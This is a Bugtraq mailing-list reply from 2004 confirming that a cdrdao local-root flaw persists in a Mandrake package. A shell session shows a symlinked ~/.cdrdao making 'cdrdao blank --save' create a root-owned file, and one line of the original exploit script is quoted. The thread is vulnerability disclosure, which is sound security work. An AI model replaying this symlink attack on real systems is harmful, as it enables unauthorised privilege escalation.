Bugtraq mailing list archives

Re: cdrdao local root exploit

From: newbug Tseng <newbug () chroot org>
Date: 1 Oct 2004 19:05:58 -0000

In-Reply-To: <1157225765.20040907131857 () SECURITY NNOV RU>

The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@localhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@localhost tmp]$ ln -s /blah .cdrdao
[newbug@localhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@localhost tmp]$ cdrdao blank --save
.
.
.
[newbug@localhost tmp]$ ls -al /blah
-rw-rw-r--  1 root cdwriter 32 10&#26376;  2 10:41 /blah
[newbug@localhost tmp]$

newbug Tseng

Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
Date: Tue, 7 Sep 2004 13:18:57 +0400
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Reply-To: 3APA3A <3APA3A () SECURITY NNOV RU>
Organization: http://www.security.nnov.ru
Message-ID: <1157225765.20040907131857 () SECURITY NNOV RU>
To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias () caramail com>
Cc: bugtraq () securityfocus com
Subject: Re: cdrdao local root exploit
In-Reply-To: <20040905191642.18379.qmail () www securityfocus com>
References: <20040905191642.18379.qmail () www securityfocus com>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Jérôme ATHIAS,

This  bug  was  originally  reported  to  Bugtraq  by Andreas Mueller on
January, 15 2002

--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq () securityfocus com:

JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"



-- 
~/ZARAZA
Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü.  (Òâåí)

Current thread:

Re: cdrdao local root exploit newbug Tseng (Oct 01)